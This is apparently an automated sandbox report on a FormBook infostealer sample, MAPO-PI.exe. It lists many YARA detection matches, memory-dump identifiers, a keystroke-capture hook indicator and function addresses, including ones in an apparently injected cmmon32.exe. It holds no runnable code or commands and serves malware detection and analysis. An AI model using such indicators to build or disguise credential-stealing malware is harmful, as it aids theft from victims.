Creates a DirectInput object (often for capturing keystrokes)
Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: MAPO-PI.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_00075376 0_2_00075376
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_0094E6A0 0_2_0094E6A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_0094E690 0_2_0094E690
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_0094CC5C 0_2_0094CC5C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 0_2_00072050 0_2_00072050
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041E269 3_2_0041E269
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041DA87 3_2_0041DA87
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041D475 3_2_0041D475
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409E2B 3_2_00409E2B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409E30 3_2_00409E30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041DFFF 3_2_0041DFFF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CF96 3_2_0041CF96
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00EB5376 3_2_00EB5376
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189F900 3_2_0189F900
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB090 3_2_018AB090
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019620A8 3_2_019620A8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019628EC 3_2_019628EC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951002 3_2_01951002
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196E824 3_2_0196E824
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 3_2_018BA830
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CEBB0 3_2_018CEBB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195DBD2 3_2_0195DBD2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019503DA 3_2_019503DA
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CABD8 3_2_018CABD8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 3_2_019423E3
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01962B28 3_2_01962B28
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BAB40 3_2_018BAB40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019622AE 3_2_019622AE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194FA2B 3_2_0194FA2B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019625DD 3_2_019625DD
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AD5E0 3_2_018AD5E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01962D07 3_2_01962D07
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01890D20 3_2_01890D20
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01961D55 3_2_01961D55
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A841F 3_2_018A841F
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195D466 3_2_0195D466
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196DFCE 3_2_0196DFCE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01961FF1 3_2_01961FF1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01962EF7 3_2_01962EF7
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195D616 3_2_0195D616
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B6E30 3_2_018B6E30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00EB2050 3_2_00EB2050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2D466 16_2_04D2D466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7841F 16_2_04C7841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D325DD 16_2_04D325DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7D5E0 16_2_04C7D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C92581 16_2_04C92581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D31D55 16_2_04D31D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D32D07 16_2_04D32D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C60D20 16_2_04C60D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D32EF7 16_2_04D32EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2D616 16_2_04D2D616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C86E30 16_2_04C86E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3DFCE 16_2_04D3DFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D31FF1 16_2_04D31FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D328EC 16_2_04D328EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C7B090 16_2_04C7B090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C920A0 16_2_04C920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D320A8 16_2_04D320A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D21002 16_2_04D21002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D3E824 16_2_04D3E824
